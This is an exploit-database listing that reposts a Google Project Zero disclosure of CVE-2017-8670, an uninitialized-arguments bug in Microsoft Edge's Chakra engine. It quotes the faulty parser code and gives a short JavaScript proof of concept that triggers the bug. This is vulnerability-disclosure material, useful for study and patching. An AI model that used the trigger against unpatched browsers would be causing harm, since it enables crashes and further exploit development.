0day Today Exploits Market and 0day Exploits Database

Microsoft Edge Chakra - Uninitialized Arguments (2) Exploit

Author: Google Security Research
Risk: High
0day-ID: 0day-ID-28295
Category: dos / poc
Date added: 17-08-2017
CVE: CVE-2017-8670
Platform: windows
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1298
 
Similar to issue #1297, but this time it happens in "Parser::ParseFncFormals" with the "PNodeFlags::fpnArguments_overriddenInParam" flag.
 
template<bool buildAST>
void Parser::ParseFncFormals(ParseNodePtr pnodeFnc, ParseNodePtr pnodeParentFnc, ushort flags)
{
    ...
    if (IsES6DestructuringEnabled() && IsPossiblePatternStart())
    {
        ...
        // Instead of passing the STFormal all the way on many methods, it seems it is better to change the symbol type afterward.
        for (ParseNodePtr lexNode = *ppNodeLex; lexNode != nullptr; lexNode = lexNode->sxVar.pnodeNext)
        {
            Assert(lexNode->IsVarLetOrConst());
            UpdateOrCheckForDuplicateInFormals(lexNode->sxVar.pid, &formals);
            lexNode->sxVar.sym->SetSymbolType(STFormal);
            if (m_currentNodeFunc != nullptr && lexNode->sxVar.pid == wellKnownPropertyPids.arguments)
            {
                m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_overriddenInParam;  <<------ HERE
            }
        }
        ...
    ...
}
 
PoC:
-->
 
function f() {
    ({a = ([arguments]) => {
    }} = 1);
 
    arguments.x;
}
 
f();

#  0day.today [2024-12-26]  #